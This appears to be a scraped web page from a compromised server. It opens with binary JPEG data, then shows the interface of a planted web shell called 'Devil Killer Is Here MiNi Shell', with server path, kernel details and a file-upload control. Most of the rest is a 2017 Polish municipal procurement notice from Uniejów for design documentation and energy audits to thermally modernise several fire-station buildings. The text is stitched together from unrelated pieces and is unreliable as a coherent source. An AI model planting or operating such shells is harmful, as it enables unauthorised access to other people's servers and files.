JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170112/6651-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.uniejow.bip.net.pl' target='_blank'>http://www.uniejow.bip.net.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 6651 - 2017
              z dnia 2017-01-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Uniejów: Termomodernizacja obiektów użyteczności publicznej<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Uniejów, krajowy numer identyfikacyjny
              31101957900000, ul.
              ul. Błogosławionego Bogumiła 
              13,
              99210  
              Uniejów, woj.
              łódzkie, państwo
              Polska, tel.
              632 888 192, e-mail
              urzad@uniejow.pl, faks
              632 888 192.
              <br />
              Adres strony internetowej (URL): www.uniejow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.uniejow.bip.net.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.uniejow.bip.net.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zamawiajacy wymaga aby oferty były złożone w wersji pisemnej<br />
                Adres:
                <br />Urząd Miasta w Uniejowie, ul. Błogosławionego Bogumiła 13, 99-210 Uniejów </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Termomodernizacja obiektów użyteczności publicznej<br /><b>Numer referencyjny: </b>ZP.271.01.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest opracowanie kompletnych dokumentacji budowlano  wykonawczych budynków użyteczności publicznej wskazanych poniżej na potrzeby termomodernizacji obiektów oraz sprawowanie nadzoru autorskiego w trakcie realizacji robót.
2.	Przedmiot zamówienia jest realizowany w ramach zadania inwestycyjnego pn.: Termomodernizacja obiektów użyteczności publicznej.
3.	Przedmiot zamówienia obejmuje również opracowanie audytów energetycznych wraz z efektami ekologicznymi dla każdego obiektu osobno.
4.	Wykaz obiektów objętych przedmiotem zamówienia wraz z niezbędnymi pracami termomodernizacyjnymi 
4.1 CZĘŚĆ 1. Kompleksowa termomodernizacja obiektów użyteczności publicznej Ochotniczej Straży Pożarnej w Felicjanowie, Zaborowie oraz budynku po byłej szkole podstawowej w m. Wola Przedmiejska 
OSP  w Felicjanowie, Felicjanów 32a, dz. nr ewid. 210/3, 211, obręb Felicjanów
Strażnica w Felicjanowie składa się z połączonych budynków: głównego, pomocniczego i garażowego. Wszystkie części jednokondygnacyjne, niepodpiwniczone. Budynek główny z nieużytkowym poddaszem, dach dwuspadowy z płyt azbestocementowych na drewnianej więźbie płatwiowej. Nad garażem i budynkiem pomocniczym stropodachy o niewielkim spadku, kryte papą. W części pomocniczej znajduje się jedno pomieszczenie oraz magazyn, a w części głównej sala wielofunkcyjna o pow. 123 m2. W budynku garażowym wydzielono dwa garaże. Najstarszy budynek pomocniczy wzniesiono najprawdopodobniej w latach 20. Podwalina kamienna, ściany z kamienia wapiennego spajanego gliną, naroża i otwory wymurowane z cegły palonej. Grubość ściany zewnętrznej 49 cm. Na podłodze polepa gliniana. Od frontu budynek otynkowany, elewacja w kolorze białym, na ścianach tylnej i bocznej odsłonięty kamień. Widoczne uzupełnienia ścian z pustaków ceramicznych. Stolarka okienna z PVC. W budynku głównym ściany o gr. 47 cm z kamienia wapiennego na fundamentach z bloczków betonowych. Narożniki i komin w części południowej wymurowane z cegły palonej. Dach w konstrukcji drewnianej belkowej. Część pierwotnych otworów zamurowana, nowe drzwi i stolarka okienna z PVC. Na podłodze wylewka betonowa. Budynek garażowy powojenny. Fundamenty betonowe, ściany z pustaków ceramicznych o gr. 39 cm. Stropodach z płyt betonowych na belkach stalowych. Posadzka betonowa. Z wyjątkiem jednego okna w ścianie wschodniej stolarka okienna nowa, z PVC. Bramy garażowe stare, wykonane z desek obitych blachą. Jedynym źródłem ciepła w strażnicy jest wolnostojący piecyk na węgiel/drewno w części garażowej. 
OSP w Zaborowie, Zaborów 25, dz. nr ewid. 77, obręb Zaborów
Siedziba OSP w Zaborowie została wzniesiona na początku lat 30. Przez wiele lat budynek służył jako szkoła podstawowa. W latach 1958-72 budynek przebudowano: poszerzono go i wydłużono o ok. 5 m, całość przykryto nowym dachem.
Budynek jednokondygnacyjny, niepodpiwniczony, z nieużytkowym poddaszem. Fundamenty betonowe, ściany fundamentowe z cegły pełnej. Ściany zewnętrzne z kamienia wapiennego, o grubości 44 cm. Do budowy ścian użyto zarówno kamienia nieobrobionego, jak i ciosanego w cegłę. Budynek otynkowany. Nad południową częścią strażnicy strop drewniany, belkowy, od spodu wykończony tynkiem na deskowaniu. Nad garażem, kuchnią i pomieszczeniem gospodarczym strop żelbetowy. Dach dwuspadowy na więźbie płatwiowo-kleszczowej. Pokrycie dachu stanowi papa na pełnym deskowaniu. W garażu, kuchni i pomieszczeniu gospodarczym posadzki betonowe. W reszcie pomieszczeń podłoga z desek na legarach na słupkach na podsypce z piasku. Stolarka okienna wymieniona w latach 90-tych, z PVC. Drzwi i brama garażowa drewniane. Pomieszczenia ogrzewane za pomocą piecyka wolnostojącego na węgiel/drewno. 

Budynek po byłej szkole w m .Wola Przedmiejska 
Budynek niepodpiwniczony, dwukondygnacyjny z poddaszem nieużytkowym. Technologia budynku - tradycyjna ( cegła ).  Ściany nieocieplone. Stropy nieocieplone. Okna mieszanego typu.   Kubatura budynku: 663m3. 
Zakres dokumentacji projektowej  na wyżej wymienionych obiektach powinien obejmować m.in.:
	Wymianę pokrycia dachowego
	Wymiana konstrukcji dachu 
	Ocieplenie stropodachu i dachu, 
	Ocieplenie ścian zewnętrznych, 
	Wymianę stolarki okiennej i drzwiowej, 
	Wykonanie  nowej instalacji grzewczej. Należy zaprojektować ekologiczne rozwiązanie z wyłączeniem kotłów na paliwo stałe. 
	Sporządzenie audytów energetycznych wraz z efektami ekologicznymi
	zaprojektowania systemu fotowoltaicznego na potrzeby ciepłej wody użytkowej
	wizualizację każdego obiektu ( wymaga się zastosowania kamienia wapiennego  na elewacji frontowej )
Wykonawca zobowiązany jest do opracowania audytów ,dokumentacji i wizualizacji  dla każdego obiektu osobno. Wykonawca zobowiązany jest do zaprojektowania w dokumentacji prace wynikające z audytów energetycznych
4.2. CZĘŚĆ 2. Kompleksowa termomodernizacja obiektów użyteczności publicznej Ochotniczej Straży Pożarnej w Człopach, Górach oraz  budynku byłej kaplicy  w Rożniatowie .
OSP  w Człopach, Człopy 39, dz. nr ewid. 268, obręb Człopy .
Budynek parterowy, częściowo podpiwniczony, kryty dwuspadowym dachem. Konstrukcja dachu z wiązarów kratowych deskowych oraz krokwi nad niższą częścią budynku. Pokrycie z płyt azbestocementowych. Fundamenty betonowe. Ściany zewnętrzne częściowo z cegły wapiennej pełnej (najstarsze fragmenty ścian: frontowej i bocznej o gr. 70 cm), częściowo z pustaka żużlowego, o gr. 41 cm. Elewacje otynkowane. Posadzki betonowe, w sali wielofunkcyjnej podłoga z desek na legarach na słupkach na podsypce z piasku. W sali, przedsionku, pom. OSP i garażu sufity, w pom. zapleczowym i magazynie odsłonięte krokwie. W ścianie frontowej nowe aluminiowe drzwi wejściowe, brama garażowa i stolarka okienna z PVC. Pozostała stolarka drewniana.

OSP  w Górach, Góry 25a, dz. nr ewid. 615/1, 616, 621/1, obręb Góry 
Strażnica w Górach została zbudowana w latach 1969-72. Budynek złożony z dwóch przenikających się brył o różnych wysokościach. Strażnica jednokondygnacyjna, niepodpiwniczona, kryta stropodachem Fundamenty betonowe, ściany zewnętrzne o gr. 40 cm z pustaków cementowo-piaskowych wyrabianych na budowie, otynkowane. Strop ceramiczny typu Kleina na belkach stalowych. Posadzki betonowe, w sali wielofunkcyjnej podłoga z desek na legarach na podsypce z piasku. Stolarka okienna z PVC starego typu, w garażu i pomieszczeniu OSP stara ślusarka okienna metalowa. 
W strażnicy znajduje się przedsionek, sala wielofunkcyjna o pow. 87 m2, pomieszczenie OSP i garaż. Ogrzewanie za pomocą piecyka wolnostojącego na węgiel/drewno. 

Budynek kaplicy w Rożniatowie, Rożniatów 10, dz. nr ewid. 93, obręb Rożniatów - 
Budynek wzniesiony w 1982 roku. Przez wiele lat pełnił funkcję szkoły podstawowej.
Budynek jednokondygnacyjny, podpiwniczony. Stropodach jednospadowy, prawdopodobnie o konstrukcji drewnianej, kryty blachą falistą. Fundament betonowy, ściany zewnętrzne o gr. 56 cm. Ściany piwnicy z pustaków żużlowych, ściany parteru warstwowe: pustak ceramiczny/pustka powietrzna/pustak ceramiczny. Stropy z płyt kanałowych o gr. 37 cm. Posadzki parteru  lastryko, w piwnicy  wylewka betonowa. Nowa stolarka okienna i drzwi wejściowe z PVC.  Instalacja centralnego ogrzewania niesprawna. 

Zakres dokumentacji projektowej  na wyżej wymienionych obiektach powinien obejmować m.in.
	 Docieplenie stropodachu i dachu, 
	Ocieplenie ścian zewnętrznych, 
	Wymianę stolarki okiennej i drzwiowej, 
	Wykonanie  nowej instalacji grzewczej. Należy zaprojektować ekologiczne rozwiązanie z wyłączeniem kotłów na paliwo stałe. . 
	Sporządzenie audytów energetycznych wraz z efektami ekologicznymi
	zaprojektowania systemu fotowoltaicznego na potrzeby ciepłej wody użytkowej
	wizualizację każdego obiektu ( wymaga się zastosowania kamienia wapiennego  na elewacji frontowej  )
	Wykonawca zobowiązany jest do opracowania audytów ,dokumentacji i wizualizacji  dla każdego obiektu osobno. Wykonawca zobowiązany jest do zaprojektowania w dokumentacji prace wynikające z audytów energetycznych
4.3. CZĘŚĆ 3. Kompleksowa termomodernizacja obiektów użyteczności publicznej Ochotniczej Straży Pożarnej w Orzeszkowie, Skotnikach i Woli Przedmiejskiej.
OSP w Orzeszkowie -  Orzeszków 2, dz. nr ewid. 77, obręb Orzeszków
Budynek wzniesiony na początku lat 30. W roku 1962 gruntownie odremontowany. W latach 70. strażnica rozbudowywana. W latach 70. i 80. przeprowadzano prace remontowe.
Budynek jednokondygnacyjny, niepodpiwniczony, kryty dachem dwuspadowym z płyt azbestocementowych na więźbie płatwiowo-krokwiowej. Dach nad salą prawdopodobnie na wiązarach deskowych. Fundamenty betonowe. Ściany zewnętrzne z cegły cementowej w części głównej (60 cm grubości), ciosanego wapienia w garażu (48 cm grubości), i pustaka żużlowego w dobudowanym aneksie sali (29 cm grubości).. Posadzka w sali wielofunkcyjnej: deski na legarach na wylewce, w pozostałych pomieszczeniach wylewka, w części zachodniej (dawny sklep)  lastryko. Nad salą sufit z płyt drewnopochodnych, nad garażem i dawnym sklepem strop ceramiczny typu Kleina na belkach stalowych. Drzwi i brama garażowa drewniane, stolarka okienna z PVC starego typu.

OSP  w Skotnikach - Skotniki 6a, dz. nr ewid. 177/1, obręb Skotniki 
Budynek jednokondygnacyjny, zbudowany w technologii murowanej. Ściany zewnętrzne części garażowej z pustaków cementowych, o gr. 25 cm. Ściana frontowa garażu ze schodkowa attyka. Ściany zewnętrzne części głównej z pustaków żużlowych. Górne fragmenty ścian szczytowych z pustaków ceramicznych. Budynek niepodpiwniczony. Garaż i przybudówka kryte stropodachami z płyt betonowych na belkach stalowych, nad budynkiem głównym dach dwuspadowy z płyt eternitowych na kratownicy z desek. Stolarka okienna w większości drewniana. Ogrzewanie za pomocą piecyka wolnostojącego na węgiel/drewno
OSP w Woli Przedmiejskiej - Wola Przedmiejska 18a, dz. nr ewid. 103/1, obręb Wola Przedmiejska
Strażnica wzniesiona w 1975 r., rozbudowana w latach 1984-85. 
Budynek jednokondygnacyjny, z nieużytkowym poddaszem, niepodpiwniczony. Fundamenty betonowe, ściany zewnętrzne o grubości 41 cm z pustaków żużlowych, otynkowane, malowane na biało. Pomieszczenia przykryte stropem z płyt żelbetowych opartych na belkach stalowych dwuteowych. Dach z płyt azbestocementowych opartych na drewnianej więźbie płatwiowo-kleszczowej. Na podłodze wylewka betonowa, w sali wielofunkcyjnej gres. Stolarka okienna z PCV, z wyjątkiem okien garażu (ślusarka metalowa) i pomieszczenia OSP (drewno). Okna, drzwi wejściowe i bramę garażową wymieniano ok. 10 lat temu.
Budynek składa się z dwóch części: ogólnej i garażowej. W części ogólnej znajduje się przedsionek, kuchnia, toaleta, pomieszczenie OSP oraz duża sala wielofunkcyjna (86 m2) ze sceną, w której organizowane są imprezy. Część garażowa, dostępna z zewnątrz oraz z sali wielofunkcyjnej, składa się z jednego pomieszczenia. Posadzka w części ogólnej jest wyniesiona ok. 58 cm nad poziom terenu, podczas gdy posadzka garażu znajduje się na poziomie terenu.
Budynek wyposażony w instalację wodociągową. Woda ogrzewana za pomocą elektrycznego ogrzewacza. Budynek nie jest podłączony do kanalizacji i nie posiada zbiornika asenizacyjnego. Instalacja elektryczna starego typu  aluminiowa. Budynek ogrzewany dwoma piecykami wolnostojącymi na węgiel/drewno. Większość pomieszczeń wyposażono w instalację wentylacji grawitacyjnej. Strażnica posiada syrenę alarmową.
Zakres dokumentacji projektowej  na wyżej wymienionych obiektach powinien obejmować m.in.
	 Docieplenie stropodachu i dachu, 
	Ocieplenie ścian zewnętrznych, 
	Wymianę stolarki okiennej i drzwiowej, 
	Wykonanie  nowej instalacji grzewczej. Należy zaprojektować ekologiczne rozwiązanie z wyłączeniem kotłów na paliwo stałe. .
	Sporządzenie audytów energetycznych wraz z efektami ekologicznymi
	zaprojektowania systemu fotowoltaicznego na potrzeby ciepłej wody użytkowej
	wizualizację każdego obiektu ( wymaga się zastosowania okładziny z kamienia wapiennego  elewacji frontowej  )
Wykonawca zobowiązany jest do opracowania audytów ,dokumentacji i wizualizacji  dla każdego obiektu osobno. Wykonawca zobowiązany jest do zaprojektowania w dokumentacji prace wynikające z audytów energetycznych
5.  Dla  obiektów  w miejscowości Orzeszków, Rożniatów i Wola Przedmiejska  należy uzyskać zgodę Regionalnej Dyrekcji Ochrony Środowiska  w Łodzi na odstępstwo od zakazów obowiązujących w stosunku do gatunków dziko występujących zwierząt objętych ochroną.
6.Wykonawca zobowiązany jest wykazać w dokumentacji wszystkie prace dodatkowe niezbędne do prawidłowej termomodernizacji każdego obiektu. 
7.Wykonawca zobowiązany jest do opracowania dokumentacji dla każdego obiektu osobno.
8.Dokumentacja musi określać niezbędne prace mające wpływ na poprawę efektywności energetycznej obiektów, zmniejszenie zapotrzebowania na energię przedmiotowych budynków. 
9.Prace termomodernizacyjne muszą być zgodne z przepisami krajowymi, unijnymi i ochrony środowiska. 
10.Wykonawca zobowiązany jest do zaprojektowania robót umożliwiających późniejszy dostęp osób niepełnosprawnych. 
11.Zamawiający ubiega się o dofinansowanie w ramach działania IV.2.2 (Termomodernizacja budynków), działania IV.2 (Termomodernizacja budynków), osi priorytetowej IV (Gospodarka niskoemisyjna) RPO WŁ na lata 2014-2020
12.Zamawiający wymaga od Wykonawcy przygotowania wniosków, złożenie i uzyskanie w imieniu Zamawiającego wszystkich decyzji niezbędnych do realizacji inwestycji przedsięwzięcia polegającego na termomodernizacji obiektów, w szczególności zgłoszenie robót lub pozwolenie na budowę jeśli wystąpi taka konieczność. 
13.Wykonawca przy opracowywaniu niniejszej dokumentacji zobowiązany będzie uwzględnić wszelkie uwagi i sugestie Zamawiającego oraz na bieżąco konsultować wszystkie projektowane rozwiązania. 
14.Wykonawca zobowiązany jest do poinformowania Zamawiającego  o wszelkich błędach, przeoczeniach i innych czynnikach mogących mieć wpływ na prawidłowe opracowanie dokumentacji. Szczegółowy zakres opracowań będzie uzgadniany z Wykonawcą  w trakcie realizacji zadania. 
15 Wykonawca winien przewidzieć konieczność wymiany konstrukcji dachu, związanych z instalacją fotowoltaiczną oraz przewidzieć wzmocnienie fundamentów pod  wykonanie elewacji z kamienia wapiennego. Wykonawca  musi uzyskać akceptację Zamawiającego na wprowadzenie zmian zakresu projektu.
16 Opracowania mają być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych 
17. Do prawidłowej realizacji przedmiotu zamówienia Wykonawca zobowiązany jest uzyskać wymagane uzgodnienia formalno  prawne i decyzje administracyjne zezwalające na wykonanie robót budowlanych dla danego zadania.
18.W projekcie budowlanym Wykonawca wskaże optymalne terminy wykonania poszczególnych robót budowlanych, uwzględniając m.in. ochronę środowiska.
19.Wykonawca w ramach przedmiotu zamówienia zobowiązany jest sporządzić kompletną dokumentację budowlano  wykonawczą wraz ze wszystkimi dokumentacjami określonymi w Rozporządzeniu w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych wraz z uzyskaniem decyzji zezwalających na wykonanie robót określonych w dokumentacji. Wykonawca zmieści w projekcie oświadczenia projektantów i osób sprawdzających o sporządzeniu projektu budowlanego, zgodnie z obowiązującymi przepisami, normami oraz zasadami wiedzy technicznej
20. Przedmiot zamówienia Wykonawca zobowiązany jest przedłożyć: 
- koncepcje poprzedzające  wykonanie dokumentacji projektowej w ilości 2 egzemplarzy dla każdego obiektu w formie papierowej oraz w 1 egzemplarzu w formie elektronicznej
- kompletne dokumentację budowlano - wykonawcze w ilości 6 egzemplarzy dla każdego obiektu  oraz w 1 egzemplarzu w formie elektronicznej .
- audyty energetyczne wraz z efektami ekologicznymi w ilości 2 egzemplarzy w formie papierowej oraz 1 egzemplarzu w formie elektronicznej dla każdego obiektu osobno,
- wizualizacje elewacji zaakceptowane przez  Zamawiającego  w ilości 2 egzemplarze w formie papierowej i 1 egzemplarz forma elektroniczna każdego obiektu

- specyfikacje techniczne wykonania i odbioru robót w ilości 6 egzemplarzy dla każdego obiektu  oraz w 1 egzemplarzu w formie elektronicznej
-przedmiary robót dla każdego obiektu osobno w ilości 4 egzemplarze oraz w 1 egzemplarzu w formie elektronicznej.
-kosztorysy inwestorskie w ilości 2 egzemplarze oraz w 1 egzemplarzu w formie elektronicznej dla każdego obiektu osobno.
- oraz pozostałą dokumentację wymaganą przepisami prawa.
21.Wersje elektroniczne powyższych opracowań należy dostarczyć (płyta CD, DVD) w następujących formatach:
 teksty jako pliki w formacie doc, lub innym kompatybilnym z Word 2007, oraz pdf
 rysunki jako pliki w formacie dwg (do wersji AutoCad 2010 lub innym kompatybilnym z AutoCad 2010), oraz pdf
 kosztorysy, przedmiary  jako pliki w formacie xls, lub innym kompatybilnym  z Excel 2007, ( pliki nie mogą posiadać zabezpieczenia przed kopiowaniem)oraz pdf 
22.Wstępne założenia rozwiązań projektowych i ich szacunkowy koszt należy uzgodnić z Zamawiającym. Wykonawca dokumentacji projektowej spisze z Zamawiającym protokół danych wyjściowych do projektowania i kosztorysowania.
23.Wykonawca dokumentacji projektowej będzie pełnił nadzór autorski nad realizacją robót w ramach zadania wynikającego z umowy.
